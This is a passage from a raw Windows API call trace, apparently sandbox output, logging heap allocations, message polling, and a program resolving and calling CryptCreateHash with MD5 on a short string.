Flags=0x0, Size=0x10) returned 0x2e508c0 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0187.454] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0187.454] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.454] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0187.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0187.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0187.455] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.455] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0187.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0187.455] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.455] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0187.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0187.455] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.455] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0187.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0187.456] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0187.456] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0187.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0187.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0187.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0187.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0187.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0187.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0187.457] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.457] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0187.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0187.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0187.457] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.457] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0187.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0187.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0187.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0187.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0187.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0187.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50aa0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0187.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.458] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0187.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0187.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0187.458] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0187.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0187.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0187.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0187.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0187.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0187.461] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0187.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0187.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0187.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0187.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0187.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0187.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0187.462] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0187.462] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0187.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0187.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0187.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0187.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.462] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0187.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ef8 [0187.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0187.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0187.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0187.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0187.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0187.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0187.464] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0187.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ef8 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: 